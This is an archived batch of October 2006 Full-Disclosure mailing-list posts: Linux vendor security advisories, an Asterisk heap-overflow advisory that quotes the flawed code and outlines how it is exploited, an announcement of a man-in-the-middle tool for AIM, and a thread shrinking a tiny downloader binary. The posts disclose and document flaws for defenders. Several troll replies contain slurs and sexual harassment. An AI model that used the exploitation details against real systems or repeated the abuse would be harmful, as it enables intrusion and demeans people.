[Full-disclosure] [SECURITY] [DSA 1196-1] New clamav packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1196-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff October 19th, 2006 http://www.debian.org/security/faq - -- Package: clamav Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-4182 CVE-2006-5295 Several remote vulnerabilities have been discovered in the ClamAV malware scan engine, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2006-4182 Damian Put discovered a heap overflow error in the script to rebuild PE files, which could lead to the execution of arbitrary code. CVE-2006-5295 Damian Put discovered that missing input sanitising in the CHM handling code might lead to denial of service. For the stable distribution (sarge) these problems have been fixed in version 0.84-2.sarge.11. Due to technical problems with the build host this update lacks a build for the Sparc architecture. It will be provided soon. For the unstable distribution (sid) these problems have been fixed in version 0.88.5-1. We recommend that you upgrade your clamav packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.11.dsc Size/MD5 checksum: 874 28ac6ad45d008a1a40f1043ce208f7e9 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.11.diff.gz Size/MD5 checksum: 176562 4b0c191cf10e3184baee4004c7992b09 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84.orig.tar.gz Size/MD5 checksum: 4006624 c43213da01d510faf117daa9a4d5326c Architecture independent components: http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.84-2.sarge.11_all.deb Size/MD5 checksum: 154890 32b1629d649ed6168dd411e0458cca08 http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.84-2.sarge.11_all.deb Size/MD5 checksum: 694414 e8160f6502023138511d613240ff8a7a http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.84-2.sarge.11_all.deb Size/MD5 checksum: 123884 82b26302a2c4697b7d58825dd64149c3 Alpha architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.11_alpha.deb Size/MD5 checksum:74768 39a1eb656cb857019708e6a9f13e6670 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.11_alpha.deb Size/MD5 checksum:48830 de988902ce6b7a56b0f72daa6e113614 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.11_alpha.deb Size/MD5 checksum: 2176452 e16e6c071d0233820855fb4777b90a7d http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.11_alpha.deb Size/MD5 checksum:42120 fa4bd16b77814caf48f9c32e5ebf10f4 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.11_alpha.deb Size/MD5 checksum: 255774 19ff1809f543ca8aadb819be4b879f44 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.11_alpha.deb Size/MD5 checksum: 285586 e33630652b74d4a2ddb1c936daf4a7ec AMD64 architecture: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.11_amd64.deb Size/MD5 checksum:68850 03fd7d2e437ef1d337236884289f9cfd http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.11_amd64.deb Size/MD5 checksum:44186 3b44c71024838a3d9e367807fe8664dd http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.11_amd64.deb Size/MD5 checksum: 2173268 f41d15ff5a51f3aa601d8bc1f5ddad6a http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.11_amd64.deb Size/MD5 checksum:39988 3ae59e939bb67cb743c655089d7c66a7 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.11_amd64.deb Size/MD5 checksum: 176496 bb458a66c0422f2c567e0f5bc0db6fc0 http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.11_amd64.deb Size/MD5 checksum: 259796 ace9bd92aec68b79785d812
[Full-disclosure] [ANNOUNCE] Aimject 0.8
Aimject 0.8 has been released: http://jon.oberheide.org/projects/aimject/ Aimject facilitates man-in-the-middle attacks against AOL Instant Messenger's OSCAR protocol via a simple GTK interface. Changes since 0.6: * integrated ARP/DNS spoofing * IP forwarding command execution (linux/*bsd) * max screenname length bumped to account for extended names * screenname formatting issue fixed to avoid detection during local message injection Regards, Jon Oberheide -- Jon Oberheide <[EMAIL PROTECTED]> GnuPG Key: 1024D/F47C17FE Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How To Spot A Narq With Ease
lol how r u comin falling for an obvious troll like that and calling the kettle black ?On 10/18/06, Jason Miller < [EMAIL PROTECTED]> wrote:wow you're fucking retarded and show no intelligence at all. On 10/18/06, vile < [EMAIL PROTECTED]> wrote: ok guys, this one is really easy. spotting narqz can usually be hard, but I found a great method! go to any full-disclosure list, and you'll usually see a bunch of whitehats talking about vulnerabilities. most of these guys are like super hackers, so don't mess with them. however, they are all narqs too! usually anyone who believes in full-disclosure is a possible narq. so do not tell any of these people about how you owned their mom's laptop. they will fucking go CRAZY! CRZYY!!! ROOOAAAR! they will call the local authorities and tell them that you owned their mom's laptop, and the cops will laugh at them. But just so you know, they do actively search for criminalz. just ask some dude if he believes in full-disclosure. if he says yes: NARQ [EMAIL PROTECTED] l8r narqz. ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-367-1] Pike vulnerability
=== Ubuntu Security Notice USN-367-1 October 18, 2006 pike7.6 vulnerability CVE-2006-4041 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: pike7.6-pg 7.6.13-1ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: An SQL injection was discovered in Pike's PostgreSQL module. Applications using a PostgreSQL database and uncommon character encodings could be fooled into running arbitrary SQL commands, which could result in privilege escalation within the application, application data exposure, or denial of service. Please refer to http://www.ubuntu.com/usn/usn-288-1 for more detailled information. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6_7.6.13-1ubuntu0.1.diff.gz Size/MD5:33641 9cf8608d265816c30f5f604fa6a085eb http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6_7.6.13-1ubuntu0.1.dsc Size/MD5: 1503 f6610676627575bd075b4438dcf26407 http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6_7.6.13.orig.tar.gz Size/MD5: 7979900 4fb4a8111e8986161579f8187c13f512 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-dev_7.6.13-1ubuntu0.1_all.deb Size/MD5: 226590 0837073b4efeb38bd85b81f5cd82752d http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-doc_7.6.13-1ubuntu0.1_all.deb Size/MD5:17166 4a6458eeb774539a7be8f749c8aef786 http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-manual_7.6.13-1ubuntu0.1_all.deb Size/MD5: 4081894 0542352cd88d41baf409a12ee8f7ff6a http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-meta_7.6.13-1ubuntu0.1_all.deb Size/MD5:17264 c89ebcf1da22be06083884416db1bb67 http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-reference_7.6.13-1ubuntu0.1_all.deb Size/MD5: 5543468 f11f83cdaa2341d94d66a9a68539cea4 http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6_7.6.13-1ubuntu0.1_all.deb Size/MD5:17328 bc2e9528b1d347b4611135f6746a48e3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-bzip2_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:26784 524734dc76b7f2d83b823ea04adede2c http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-core_7.6.13-1ubuntu0.1_amd64.deb Size/MD5: 2504566 8d7bafdd7bd5da0a037fc6dd72d5896c http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-gdbm_7.6.13-1ubuntu0.1_amd64.deb Size/MD5: 7898 20a9f03a4cc7858d6fe41f9d807dcc34 http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-gl_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:46996 922c5ad973ce3ee6e12d7b4e9fd35942 http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-gtk_7.6.13-1ubuntu0.1_amd64.deb Size/MD5: 177272 2f617d45dad2000863ddf0e4f6156761 http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-image_7.6.13-1ubuntu0.1_amd64.deb Size/MD5: 375688 56553800698c6af17e0529f9d3055589 http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-mysql_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:24204 05266a27dea198e4a8ce41dd3cb7db9d http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-odbc_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:11078 38af730e74c3b4762ea56c1944f9b6b7 http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-pcre_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:26982 c040777a742396d7927b1aa1a16510a9 http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-perl_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:13920 2b58a270c3a05ec676d4a0c9a95bb65b http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-pg_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:18226 5c8a244cb18f0db31425c5d2e07dea6b http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-sane_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:10558 c58f84b2b91d8ad2ca8ed56cd9fe4d66 http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-sdl_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:40046 698ba11b04180b9678fd28ea44a91dd4 http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-svg_7.6.13-1ubuntu0.1_amd64.deb Size/MD5:21570 73b99aa071038b408795bf558700d532 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-bzip2_7.6.13-1ubuntu0.1_i386.deb Size/MD5:
[Full-disclosure] rPSA-2006-0195-1 kdelibs
rPath Security Advisory: 2006-0195-1 Published: 2006-10-18 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: kdelibs=/[EMAIL PROTECTED]:devel//1/3.4.2-5.12-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811 https://issues.rpath.com/browse/RPL-723 Description: Previous versions of the KDE khtml library use Qt in a way that allows unchecked pixmap image input to be provided to Qt, triggering an integer overflow flaw in Qt. This enables a user-complicit denial of service attack (application crash), or possibly unauthorized access via arbitrary code execution. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security-Assessment.com Advisory: Asterisk remote heap overflow
= Asterisk - chan_skinny Remote Unauthenticated Heap Overflow
=
= Vendor Website:
= http://www.asterisk.org
=
= Affected Version:
= All 1.2-branch releases prior to and including 1.2.12.1
= All 1.0-branch releases prior to and including 1.0.12
=
= Not Affected:
= All 1.4-branch beta releases (1.4.0-beta1, 1.4.0-beta2)
=
= Public disclosure on Oct 19, 2006
== Overview ==
Asterisk is "The Opensource PBX", a popular software telephony server.
The Asterisk Skinny channel driver for Cisco SCCP phones chan_skinny.so)
incorrectly validates a length value in the packet header. An integer
wrap-around leads to heap overwrite, and arbitrary remote code execution
as root.
== Details ==
The function 'static int get_input(struct skinnysession *s)' in
chan_skinny.c incorrectly validates a user supplied length in the packet
header. In the code below, four bytes of data are read from the socket,
cast to a signed integer, and assigned to dlen. If dlen is between -1
and -8 then (dlen + 8) will integer wrap to be greater than zero, but
less than sizeof(s->inbuf) for the purposes of this comparison.
Next, dlen + 4 is passed to read() as the maximum number of bytes to
write to s->inbuf+4. Read() takes an unsigned value, so dlen is
interpreted as a very large number. For example, a value of -6 is
interpreted as 0xfffa bytes. This instructs read() to write beyond
the allocated 1000 byte length of the buffer s->inbuf.
Code asterisk-1.2.12.1/channels/chan_skinny.c lines 2860-2870
res = read(s->fd, s->inbuf, 4); // <- integer read from attacker
if (res != 4) {
ast_log(LOG_WARNING, "Skinny Client sent less data than expected.\n");
return -1;
}
dlen = letohl(*(int *)s->inbuf);// <- input 0xfffa
// interpreted as signed
if (dlen+8 > sizeof(s->inbuf)) // <- integer wrap to +2
dlen = sizeof(s->inbuf) - 8; // bypasses this check
}
*(int *)s->inbuf = htolel(dlen);// casting just for amusement
res = read(s->fd, s->inbuf+4, dlen+4); /* <- dlen now unsigned again
* permitting read() to write
* up to 0xfffa bytes off
* the end of s->inbuf
*/
== Exploitation ==
An attacker who can connect to the Asterisk server SCCP "Skinny" port
(by default 2000/tcp) can attack the vulnerable function prior to
registering as a configured Skinny phone, permitting pre-authentication
remote compromise.
Once the initial length header value in the packet performs an
integer-wraparound an attacker can overflow off the end of the
malloc()ed input buffer, and into heap space above it. Exploitation is
possible via standard heap-overflow malloc-unlink-macro technique[1] on
glibc versions prior to 2.3.5. On systems with newer glibc, a more
sophisticated exploitation method is necessary due to the improved
validation of malloc's internal heap management linked lists. Brett
Moore's work[2] on bypassing similar restrictions in WinXPSP2 is
instructive.
Our proof-of-concept exploit uses vanilla malloc-unlink() to overwrite a
GOT entry to point execution back into our buffer, and executes
Metasploit port-binding shellcode.
== Solutions ==
- Disable the chan_skinny module if it is not required.
- Firewall port 2000/tcp from untrusted networks.
- Install the vendor supplied upgrades:
1.0-branch: Upgrade to 1.0.12 or later
1.2-branch: Upgrade to 1.2.13 or later
== Credit ==
Discovered and advised to Digium 17th October, 2006 by Adam Boileau of
Security-Assessment.com.
Security-Assessment.com commends Digium on their extremely rapid
response, releasing an updated version within two days of receiving our
vulnerability report.
== References ==
[1] "Advanced Doug Lea's Malloc Exploits" by jp
http://doc.bughunter.net/buffer-overflow/advanced-malloc-exploits.html
[2] "Exploiting Freelist[0] On Windows XP Service Pack 2" by Brett Moore
http://www.security-assessment.com/technical/
== About Security-Assessment.com ==
Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and
a high level of technical expertise while creating long and lasting
professional relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and pr
Re: [Full-disclosure] How To Spot A Narq With Ease
wow you're fucking retarded and show no intelligence at all.On 10/18/06, vile <[EMAIL PROTECTED]> wrote: ok guys, this one is really easy. spotting narqz can usually be hard, but I found a great method! go to any full-disclosure list, and you'll usually see a bunch of whitehats talking about vulnerabilities. most of these guys are like super hackers, so don't mess with them. however, they are all narqs too! usually anyone who believes in full-disclosure is a possible narq. so do not tell any of these people about how you owned their mom's laptop. they will fucking go CRAZY! CRZYY!!! ROOOAAAR! they will call the local authorities and tell them that you owned their mom's laptop, and the cops will laugh at them. But just so you know, they do actively search for criminalz. just ask some dude if he believes in full-disclosure. if he says yes: NARQ [EMAIL PROTECTED] l8r narqz. ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-366-1] binutils vulnerability
=== Ubuntu Security Notice USN-366-1 October 18, 2006 binutils vulnerability CVE-2005-4808 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: binutils 2.16.1-2ubuntu6.3 binutils-static 2.16.1-2ubuntu6.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A buffer overflow was discovered in gas (the GNU assembler). By tricking an user or automated system (like a compile farm) into assembling a specially crafted source file with gcc or gas, this could be exploited to execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3.diff.gz Size/MD5:41663 eb868bd74f535df57afe1cdf6630f5f7 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3.dsc Size/MD5: 892 2959647799b6a665bea62066279e2ce7 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1.orig.tar.gz Size/MD5: 16378360 818bd33cc45bfe3d5b4b2ddf288ecdea Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-doc_2.16.1-2ubuntu6.3_all.deb Size/MD5: 459922 3007ff36ccf1f20d02c92684e74862bd amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.3_amd64.deb Size/MD5: 2359216 db2762f982b4a9251f3a9420960c5837 http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.3_amd64.deb Size/MD5: 7202118 66c145b29ecba13265c90ff14eee743d http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.3_amd64.udeb Size/MD5: 605798 7e84c6ae5c9283b6bbc2519dc5ea045b http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static_2.16.1-2ubuntu6.3_amd64.deb Size/MD5: 632032 95ab22250e577fbfc3a7a93b15ca12e4 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3_amd64.deb Size/MD5: 1553768 3bb85a70948df7436f59fa69746281d7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.3_i386.deb Size/MD5: 2219910 7eeebf4b5fd5df9887c7e782375f37c2 http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.3_i386.deb Size/MD5: 6748598 f31d91f437947a96c39cc638c7204bcb http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.3_i386.udeb Size/MD5: 500860 340069f8b292df6cadd2f3b6919ce332 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static_2.16.1-2ubuntu6.3_i386.deb Size/MD5: 526798 447e3be6be74c1cc6b3210255965c5dd http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3_i386.deb Size/MD5: 1470052 efc870689b6d3fd90b9a078670498a5b powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.3_powerpc.deb Size/MD5: 2836604 a70cc1fb92e14aa2ba3d141854fef344 http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.3_powerpc.deb Size/MD5: 8204624 6503f8145c38f0e009236c9625d19538 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.3_powerpc.udeb Size/MD5: 619148 1beb63b658036d46ae917bd41d7fd2b6 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static_2.16.1-2ubuntu6.3_powerpc.deb Size/MD5: 645238 cfe70541d367b7e8345362c10085496f http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3_powerpc.deb Size/MD5: 1653200 dd230b6a61934185aaf084921a1b4df0 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.3_sparc.deb Size/MD5: 2198844 f1f90a2b1bdc569ee85c467e79a99bd1 http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.3_sparc.deb Size/MD5: 7109028 649c2e8ecd95081d61e8f232dc1c7135 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.3_sparc.udeb Size/MD5: 622592 254e2d9f860f0cd7c7d316a6d0338aa3 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static_2.16.1-2ubuntu6.3_sparc.deb Size/MD5: 648510 6aac4122fa6848e2dfd5754da7100a76 http://secur
Re: [Full-disclosure] Analysis of the Oracle October 2006 Critical Patch Update
i butt fucked your sister, David. She moaned like a little bitch. On 10/18/06, Paul Schmehl <[EMAIL PROTECTED]> wrote: Thanks, David, for your always enlightening (and depressing if you useOracle products) reports on the unbreakable database. --On Wednesday, October 18, 2006 07:55:35 +0100 David Litchfield<[EMAIL PROTECTED]> wrote:> Hey all,> I've just posted an analysis of the 22 Oracle RDBMS flaws patched by the > October 2006 Critical Patch Update that was released yesterday:> http://www.oracle.com/technology/deploy/security/critical-patch-updates/c > puoct2006.html. Further, it's a shame to see that, after a promising> July 2006 CPU where Oracle had all the patches ready *on time*, they> have slipped back into their old, bad habits - patches are not ready for > a number of platforms. I thought they'd solved those issues - but> clearly not. You can get a copy of the analysis from> http://www.databasesecurity.com/oracle/OracleOct2006-CPU-Analysis.pdf,> Cheers,> David Litchfield> NGSSoftware Ltd> http://www.ngssoftware.com/ > +44(0) 208 401 0070> ___> Full-Disclosure - We believe in it.> Charter: http://lists.grok.org.uk/full-disclosure-charter.html> Hosted and sponsored by Secunia - http://secunia.com/Paul Schmehl ([EMAIL PROTECTED] )Adjunct Information Security OfficerThe University of Texas at Dallashttp://www.utdallas.edu/ir/security/___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Attacking the local LAN via XSS
holy shit! you all are the biggest faggots i've ever seen! On 8/10/06, Florian Weimer <[EMAIL PROTECTED]> wrote: * pdp:> 1. page that is controlled by the attacker, lets call it evil.com > 2. border router vulnerable to XSS> 3. user attending evil.comThis has nothing to do with cross-site scripting attacks, it's anentirely different vulnerability class called cross-site request forgery (CSRF). A lot of web applications are afffected.Technically, this is a browser vulnerability, but you can't fix itthere as cross-site requests are too common in the real world.___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joe Job - to blue pill
guess what, losers? i'm god. On 10/18/06, Larry Pesce <[EMAIL PROTECTED]> wrote: William Knowles wrote:>One time mailings with companies I have no previous business relationships I can almost forgive, subscribing me to mailing lists without my permission,I >can't.and the e-mails sent to the list do not contain any apparent way tounsubscribe. I don't know about any one else, but I did not get a notice that I was subscribed, or how to unsubscribe.I'm thinking Joe just self-fulfilled his own prophecy on "tons of mailserverblacklists by the end of the day today".So, how about the name of the company that sold you the list, Joe? - L___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Use Google to discover web attacks
oh my god! what a ground breaking discovery!@ shut the fuck up you furry faggots. don't ever post again, you knob sucking homos. On 8/10/06, Valery Marchuk <[EMAIL PROTECTED]> wrote: These are traces lerft by webinspect and Watchfire Appscanwebinspect: http://www.google.ru/search?q=serverinclude.htmlWatchfire Appscan:http://www.google.ru/search?q=watchfire+%22xss+test%22The article is available in Russian at http://www.securitylab.ru/news/271743.php___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] speaking of code crunching... (challenge)
you all are furry faggots. On 10/17/06, Gadi Evron <[EMAIL PROTECTED]> wrote: On Mon, 16 Oct 2006, Gadi Evron wrote:> sort of challenge to see if someone else can get there first (without, > say, making the URL shorter). :)Crunched furtherNew binary at 384 bytes is here:http://ragestorm.net/tiny/tiny2.exeBlog entry on how this was done is here: http://blogs.securiteam.com/index.php/archives/679The relevant text from the blog, a chat session log:Arkon: The problem with that URLDownloadToFileA is that it creates another thread,Arkon: and that thread never terminates for some unknown reason to me.Arkon: So I HAD to call ExitProcess and finish it, otherwise my processwill hang. :(Arkon: But now what I'm going to do is raising a silent exception :x Matthew: Just blow away the SEH chain and trigger an INT3.Arkon: It will eliminate the string "ExitProcess" and the GetProcAddresscode for it as well.Matthew:MOV FS:[0], 0xINT3 Matthew: BAM! :) Instant process death...Arkon: This is too long.Matthew:PUSH 0POP FS:[0]Arkon: NahMatthew: XOR ESP, ESP might also do the trick :-)Arkon: LOL!!!Matthew:XOR ESP, ESP PUSH EAXArkon:XCHG EAX, ESPPUSH 0Arkon: Wait I'm stupid, push 0 is 2 bytes long.Arkon:XCHG EAX, ESPPUSH EAXArkon: 2 bytes ExitProcess OMFGMatthew: You're a maniac Gadi. ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] How To Spot A Narq With Ease
ok guys, this one is really easy. spotting narqz can usually be hard, but I found a great method! go to any full-disclosure list, and you'll usually see a bunch of whitehats talking about vulnerabilities. most of these guys are like super hackers, so don't mess with them. however, they are all narqs too! usually anyone who believes in full-disclosure is a possible narq. so do not tell any of these people about how you owned their mom's laptop. they will fucking go CRAZY! CRZYY!!! ROOOAAAR! they will call the local authorities and tell them that you owned their mom's laptop, and the cops will laugh at them. But just so you know, they do actively search for criminalz. just ask some dude if he believes in full-disclosure. if he says yes: NARQ [EMAIL PROTECTED] l8r narqz. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ERRATA: [ GLSA 200610-07 ] Python: Buffer Overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE]GLSA 200610-07:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Python: Buffer Overflow Date: October 17, 2006 Updated: October 17, 2006 Bugs: #149065 ID: 200610-07:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata == The Resolution proposed in the original version of this Security Advisory did not properly mention the package name. The corrected sections appear below. Resolution == All Python users should update to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.3-r4" Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200610-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpDVLQXoCgNE.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia Research: IBM Lotus Notes Insecure Default Folder Permissions
